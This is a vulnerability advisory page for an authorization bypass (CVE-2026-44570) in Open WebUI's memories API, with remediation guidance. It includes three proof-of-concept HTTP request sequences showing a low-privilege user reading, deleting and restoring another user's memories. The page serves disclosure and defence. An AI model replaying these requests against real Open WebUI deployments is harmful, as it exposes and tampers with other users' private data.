Open WebUI CVE-2026-44570
HIGHSeverity by source
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L
Lifecycle Timeline
3DescriptionGitHub Advisory
Summary
Authorization controls surrounding the memories API were inconsistent, resulting in the ability of a standard user to delete, restore, and view the contents of other users' memories.
Details
Using a newly created non-admin user with no existing memories, it is possible to view existing memories via POST /api/v1/memories/query. See below under the PoC section, where a call to GET /api/v1/memories/ returns [] (as expected) but a call to POST /api/v1/memories/query reveals memories created by other users.
Similarly, even if a non-admin user cannot modify another user's memory data via POST /api/v1/memories/{memory_id}/update, the endpoint's response improperly leaks the content of that memory if a valid memory_id is known.
The DELETE /api/v1/memories/{memory_id} can also be used by any user to delete an existing memory. Deleted memories can then be restored by calling the POST /api/v1/memories/{memory_id}/update endpoint again.
PoC 1
Example of a user with no memories able to query an existing memory from another user
GET /api/v1/memories/ HTTP/1.1
Host: localhost:8080
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjUxYmI2MTZkLWI4MDktNDkwZi1hNDFmLTg5MWIwYmY0OGUyOCJ9.4W1ju8dp2LdiBbgD3q0RZ6r2Xf26ti0c-PQn7tWYXEE
User-Agent: Test
Accept: application/json
Content-Type: application/json
Connection: keep-alive
Content-Length: 0
---
HTTP/1.1 200 OK
date: Fri, 18 Jul 2025 19:19:58 GMT
server: uvicorn
content-length: 2
content-type: application/json
x-process-time: 0
[]POST /api/v1/memories/query HTTP/1.1
Host: localhost:8080
Content-Length: 19
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjUxYmI2MTZkLWI4MDktNDkwZi1hNDFmLTg5MWIwYmY0OGUyOCJ9.4W1ju8dp2LdiBbgD3q0RZ6r2Xf26ti0c-PQn7tWYXEE
User-Agent: Test
accept: application/json
Content-Type: application/json
Connection: keep-alive
{
"content": ""
}
---
HTTP/1.1 200 OK
date: Fri, 18 Jul 2025 19:22:01 GMT
server: uvicorn
content-length: 187
content-type: application/json
x-process-time: 0
access-control-allow-origin: *
access-control-allow-credentials: true
{"ids":[["d6802d76-a50f-4255-b68e-0f60c335e043"]],"documents":[["My secret content"]],"metadatas":[[{"created_at":1752784616,"updated_at":1752864797}]],"distances":[[0.6216812525921495]]}PoC 2
Example showing excess output about a memory a user has no access to modify
POST /api/v1/memories/d6802d76-a50f-4255-b68e-0f60c335e043/update HTTP/1.1
Host: localhost:8080
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjUxYmI2MTZkLWI4MDktNDkwZi1hNDFmLTg5MWIwYmY0OGUyOCJ9.4W1ju8dp2LdiBbgD3q0RZ6r2Xf26ti0c-PQn7tWYXEE
User-Agent: Test
Accept: application/json
Content-Type: application/json
Connection: keep-alive
Content-Length: 23
{
"content": ""
}
---
HTTP/1.1 200 OK
date: Fri, 18 Jul 2025 18:53:37 GMT
server: uvicorn
content-length: 172
content-type: application/json
x-process-time: 0
{"id":"d6802d76-a50f-4255-b68e-0f60c335e043","user_id":"a050e531-356b-4673-8772-ff1aecdf3273","content":"My secret content","updated_at":1752864797,"created_at":1752784616}PoC 3
Example showing a memory being deleted then restored by a different user than its owner
DELETE /api/v1/memories/d6802d76-a50f-4255-b68e-0f60c335e043 HTTP/1.1
Host: localhost:8080
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjUxYmI2MTZkLWI4MDktNDkwZi1hNDFmLTg5MWIwYmY0OGUyOCJ9.4W1ju8dp2LdiBbgD3q0RZ6r2Xf26ti0c-PQn7tWYXEE
User-Agent: Test
accept: application/json
Connection: keep-alive
---
HTTP/1.1 200 OK
date: Fri, 18 Jul 2025 19:31:19 GMT
server: uvicorn
content-length: 4
content-type: application/json
x-process-time: 0
truePOST /api/v1/memories/query HTTP/1.1
Host: localhost:8080
Content-Length: 19
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjUxYmI2MTZkLWI4MDktNDkwZi1hNDFmLTg5MWIwYmY0OGUyOCJ9.4W1ju8dp2LdiBbgD3q0RZ6r2Xf26ti0c-PQn7tWYXEE
User-Agent: Test
accept: application/json
Content-Type: application/json
Connection: keep-alive
{
"content": ""
}
---
HTTP/1.1 200 OK
date: Fri, 18 Jul 2025 19:32:31 GMT
server: uvicorn
content-length: 63
content-type: application/json
x-process-time: 0
{"ids":[[]],"documents":[[]],"metadatas":[[]],"distances":[[]]}POST /api/v1/memories/d6802d76-a50f-4255-b68e-0f60c335e043/update HTTP/1.1
Host: localhost:8080
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjUxYmI2MTZkLWI4MDktNDkwZi1hNDFmLTg5MWIwYmY0OGUyOCJ9.4W1ju8dp2LdiBbgD3q0RZ6r2Xf26ti0c-PQn7tWYXEE
User-Agent: Test
Accept: application/json
Content-Type: application/json
Connection: keep-alive
Content-Length: 23
{
"content": ""
}
---
HTTP/1.1 200 OK
date: Fri, 18 Jul 2025 19:33:05 GMT
server: uvicorn
content-length: 172
content-type: application/json
x-process-time: 0
{"id":"d6802d76-a50f-4255-b68e-0f60c335e043","user_id":"a050e531-356b-4673-8772-ff1aecdf3273","content":"My secret content","updated_at":1752864797,"created_at":1752784616}POST /api/v1/memories/query HTTP/1.1
Host: localhost:8080
Content-Length: 19
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjUxYmI2MTZkLWI4MDktNDkwZi1hNDFmLTg5MWIwYmY0OGUyOCJ9.4W1ju8dp2LdiBbgD3q0RZ6r2Xf26ti0c-PQn7tWYXEE
User-Agent: Test
accept: application/json
Content-Type: application/json
Connection: keep-alive
{
"content": ""
}
---
HTTP/1.1 200 OK
date: Fri, 18 Jul 2025 19:33:34 GMT
server: uvicorn
content-length: 187
content-type: application/json
x-process-time: 0
{"ids":[["d6802d76-a50f-4255-b68e-0f60c335e043"]],"documents":[["My secret content"]],"metadatas":[[{"created_at":1752784616,"updated_at":1752864797}]],"distances":[[0.6216812525921495]]}Impact
Potential disclosure of sensitive data stored within a user's memories. Disclosure of unique user ID values to non-admins when viewing a memory.
AnalysisAI
Authenticated low-privilege users in Open WebUI (pip package versions prior to 0.6.19) can access, delete, and restore other users' memory data through inconsistent authorization controls in the memories API. The /api/v1/memories/query endpoint allows any authenticated user to query all memories across the system regardless of ownership, while the DELETE and update endpoints enable unauthorized manipulation of other users' memory objects. A publicly available exploit code exists with three detailed proof-of-concept demonstrations published in the GitHub security advisory GHSA-hmjq-crxp-7rjw. The vulnerability carries a CVSS score of 8.3 with High confidentiality and integrity impact, exploitable remotely with low attack complexity requiring only low-privilege authentication (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L).
Technical ContextAI
This vulnerability affects the Open WebUI Python package (pkg:pip/open-webui), a web-based interface for interacting with AI models that implements a multi-user memory storage system. The flaw stems from CWE-639 (Authorization Bypass Through User-Controlled Key), where the API endpoints fail to enforce proper authorization checks before granting access to memory objects. The memories API consists of multiple REST endpoints (/api/v1/memories/query, /api/v1/memories/{memory_id}/update, DELETE /api/v1/memories/{memory_id}) that store user-specific contextual data. While the GET /api/v1/memories/ endpoint correctly enforces user-scoped authorization and returns only the authenticated user's memories, the POST /api/v1/memories/query endpoint bypasses this authorization entirely, querying the underlying memory store without filtering by user_id. Similarly, the update and delete endpoints accept memory_id parameters directly from user input without validating ownership, allowing horizontal privilege escalation. The vulnerability exists in the API layer built on uvicorn/FastAPI framework, where JWT bearer tokens authenticate users but authorization logic inconsistently validates resource ownership across different endpoints.
RemediationAI
Organizations should immediately upgrade to Open WebUI version 0.6.19 or later, which contains vendor-released patches for the authorization bypass vulnerability. The fix is available through standard pip package update: 'pip install --upgrade open-webui>=0.6.19'. The vendor advisory confirming the patched version is available at https://github.com/open-webui/open-webui/security/advisories/GHSA-hmjq-crxp-7rjw. For environments unable to immediately patch, implement network-level access controls to restrict the /api/v1/memories/* endpoints to trusted IP ranges only, though this provides limited protection against authenticated insider threats. Consider temporarily disabling the memories feature entirely if not business-critical until patching is complete-note this will impact user experience for AI conversation context persistence. Monitor API logs for suspicious patterns such as authenticated users making high-volume queries to /api/v1/memories/query or accessing memory_id values outside expected ranges, though determined attackers can evade detection. Review application logs from before patching to identify potential unauthorized access to memories data, focusing on POST requests to /api/v1/memories/query and DELETE/update operations from users who shouldn't have access to specific memory_id values. These compensating controls are interim measures only-version upgrade to 0.6.19+ is the only complete remediation.
Same technique Authentication Bypass
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-hmjq-crxp-7rjw